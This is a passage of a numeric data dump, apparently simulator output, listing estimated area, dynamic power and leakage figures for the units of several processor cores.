'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.197727,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.54777,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0491579,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.2413,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.263306,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.11315,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.182507,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0921235,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.387781,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.089042,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.46218,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0497441,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00474603,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528114,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0350998,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.102556,
'Execution Unit/Register Files/Runtime Dynamic': 0.0398458,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.123551,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.307737,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.38204,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000320225,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000320225,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000293949,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000122015,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000504212,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00143861,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00253315,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0337424,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.14631,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0771094,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.114604,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.46899,
'Instruction Fetch Unit/Runtime Dynamic': 0.229428,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0454475,
'L2/Runtime Dynamic': 0.00371366,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.58709,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.652747,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0436748,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0436747,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.79333,
'Load Store Unit/Runtime Dynamic': 0.911811,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.107695,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.215389,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0382212,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0389018,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.133449,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0126465,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.355216,
'Memory Management Unit/Runtime Dynamic': 0.0515483,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7146,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.130855,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0066975,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.055548,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.1931,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.77164,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.091538,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.147647,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0745275,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.313713,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.104693,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.02762,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00383952,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0277647,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0283956,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0277647,
'Execution Unit/Register Files/Runtime Dynamic': 0.0322351,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0584924,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.170512,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.12453,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00048232,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00048232,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000424014,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000166283,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000407905,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00179656,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00448462,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0272974,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.73635,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0533935,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0927142,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.03913,
'Instruction Fetch Unit/Runtime Dynamic': 0.179686,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0339711,
'L2/Runtime Dynamic': 0.00801619,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.30253,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.523658,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0344687,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0344686,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.4653,
'Load Store Unit/Runtime Dynamic': 0.728114,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0849939,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.169987,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0301646,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0306742,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.10796,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00875462,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.315886,
'Memory Management Unit/Runtime Dynamic': 0.0394289,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.4714,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00412994,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0482172,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
